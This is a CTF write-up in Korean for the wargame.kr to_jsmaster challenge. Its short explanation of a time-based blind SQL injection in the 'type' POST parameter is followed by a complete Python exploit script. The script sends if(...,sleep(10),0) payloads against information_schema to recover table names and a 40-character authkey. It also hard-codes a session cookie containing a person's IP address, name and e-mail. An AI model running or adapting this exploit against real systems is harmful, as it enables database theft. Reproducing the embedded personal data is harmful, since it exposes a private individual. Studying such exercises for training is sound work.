toJSmaster 메뉴에서는 type 등 여러 parameter가 POST 방식으로 전송되는데, 그중 type parameter에 SQL injection이 가능해서 이를 이용했다.

type 값으로 if(<조건>,sleep(10),0) 형태의 식을 보내고, 응답이 지연되는지(sleep이 실행되는지)로 조건의 참/거짓을 판단하는 time-based blind SQL injection이다.



import http.client
import string
from urllib import parse
import time
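# Candidate alphabet for the blind extraction, tried in this order (digits,
# letters, then punctuation).  Deduplicated while keeping order: the original
# literal listed '(' and ')' twice, which cost a redundant timing request per
# position.  Every candidate is compared by ord(), so ordering only affects
# how fast a hit is found, not what is found.
char = ''.join(dict.fromkeys(
	'0123456789' + string.ascii_letters + '_-+=~!@#$%^&*(),.?/][{}()'
))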
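def blind(q, threshold=7.0, timeout=30):
	"""Send one time-based blind SQLi probe and report whether it stalled.

	``q`` is injected verbatim as the ``type`` POST parameter of the
	to_jsmaster page.  The probe is expected to be an ``if(<cond>,sleep(N),0)``
	expression, so a response that takes longer than ``threshold`` seconds is
	taken to mean ``<cond>`` was true.  ``N`` must be comfortably larger than
	``threshold`` (and ``threshold`` larger than normal page latency), or this
	oracle silently answers False for every probe.

	Args:
		q: SQL fragment to inject; urlencoded by this function.
		threshold: seconds above which the response counts as delayed.
		timeout: socket timeout in seconds.  Must exceed the sleep a true
			branch triggers, otherwise that branch raises socket.timeout
			instead of returning True.

	Returns:
		True if waiting for the response took longer than ``threshold``.
	"""
	# NOTE(review): a live authenticated session is hard-coded here, and the
	# serialized ci_session payload carries personal data (IP, name, e-mail).
	# Rotate it before sharing this file and prefer loading it from an
	# environment variable.  Also note the pairs are joined with '&' rather
	# than '; ' as the Cookie header requires, so a compliant server parses
	# this as a single ``chat_id`` cookie whose value starts with
	# ``admin&ci_session=...``; confirm against the target whether
	# ci_session/PHPSESSID are actually needed before relying on them.
	head = {
		'Content-type': 'application/x-www-form-urlencoded',
		'Accept': 'text/plain',
		'Cookie': 'chat_id=admin&ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%220187213e7d32f2fa412fd125819038f7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22175.192.180.13%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A109%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1488460400%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A5%3A%22shnec%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22sh3077k%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A5%3A%2213400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1488459621%3B%7Dbcdd3ec89a464540180207d0b8cc5ce78a10c026&PHPSESSID=ntplo3lmasflgra1r3vavqa6h2',
	}
	params = parse.urlencode({'cont': 'aaaa', 'mail': 'guest', 'type': q})
	con = http.client.HTTPConnection('wargame.kr:8080', timeout=timeout)
	try:
		# request() connects and sends the whole body, so starting the clock
		# after it times only the server-side wait, not the upload.
		con.request('POST', '/qna/?page=to_jsmaster', params, headers=head)
		t1 = time.monotonic()
		con.getresponse().read()
		t2 = time.monotonic()
	finally:
		# The original never closed the connection, leaking one socket per
		# probe over the thousands of requests a full extraction makes.
		con.close()
	return t2 - t1 > threshold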

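def table(n, length=7):
	"""Extract the first ``n`` base-table names, one character at a time.

	For table index ``i`` (0-based, selected with ``limit i,1``) and each
	position ``1..length`` it asks the oracle whether
	``ascii(substr(table_name, j, 1))`` equals each candidate in ``char``
	and keeps the first hit.  ``0x62617365207461626c65`` is the hex encoding
	of ``'BASE TABLE'``, used so the injected string needs no quotes.

	Args:
		n: number of tables to read from information_schema.tables.
		length: characters to read per name.  Defaults to 7, the length the
			manual probes recorded in the comments below found for both
			tables; pass a larger value for longer names.
	"""
	for i in range(n):
		ans = ''
		for j in range(1, length + 1):
			for c in char:
				# The delay must clear blind()'s 7 s threshold.  The original
				# used sleep(5), which blind() could only classify as "true"
				# if the network added more than 2 s on top, so positions
				# came back empty; sleep(10) matches what key() uses.
				qq = ('if((select ascii(substr(table_name,{},1)) from '
				      'information_schema.tables where '
				      'table_type=0x62617365207461626c65 limit {},1)={},'
				      'sleep(10),0)').format(j, i, ord(c))
				if blind(qq):
					ans += c
					print('[*]find ' + ans)
					# Only one candidate can match a position; the original
					# kept probing the remaining alphabet for nothing.
					break
		print('[**]table_name : ' + ans)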
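def key(column, table, length):
	"""Extract ``length`` characters of ``column`` from ``table`` via the timing oracle.

	Position ``i`` is recovered by asking, for each candidate in ``char``,
	whether ``ascii(substr(column, i, 1))`` equals it; the first hit is kept
	and the rest of the alphabet is skipped.  The sub-select has no WHERE or
	LIMIT, so ``table`` is expected to hold a single row (as the ``authkey``
	table this was written against does); a multi-row table would make the
	comparison error out inside the injected expression.

	Args:
		column: column name, interpolated unquoted into the query.
		table: table name, interpolated unquoted into the query.
		length: number of characters to read.

	Returns:
		The recovered string.  The original only printed it; returning it as
		well lets callers reuse the value without scraping stdout.
	"""
	ans = ''
	for i in range(1, length + 1):
		for c in char:
			# sleep(10) is well above blind()'s 7 s threshold.
			qq = 'if((select ascii(substr({},{},1)) from {})={},sleep(10),0)'.format(
				column, i, table, ord(c))
			if blind(qq):
				ans += c
				print('[*]find{} '.format(i) + ans)
				break
	print('[***]key : ' + ans)
	return ans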


#table count : 2
#type=if((select length(table_name) from information_schema.tables where table_type=0x62617365207461626c65 limit 1,1)>0,sleep(5),0)
#table_length : first table=7 secondtable=7
#type=if((select length(table_name) from information_schema.tables where table_type=0x62617365207461626c65 limit 1,1)=7,sleep(5),0)
#table1 : authkey & column : authkey(guessing) & authkey length=40 | table2 : mqessage

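if __name__ == '__main__':
	# Guarded so importing this file (e.g. to reuse blind()) does not fire
	# thousands of requests at the target.  Per the manual probes recorded
	# in the comments above: two base tables, 'authkey' holding a 40-char key
	# in a column of the same name (column name guessed).
	table(2)
	key('authkey', 'authkey', 40)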
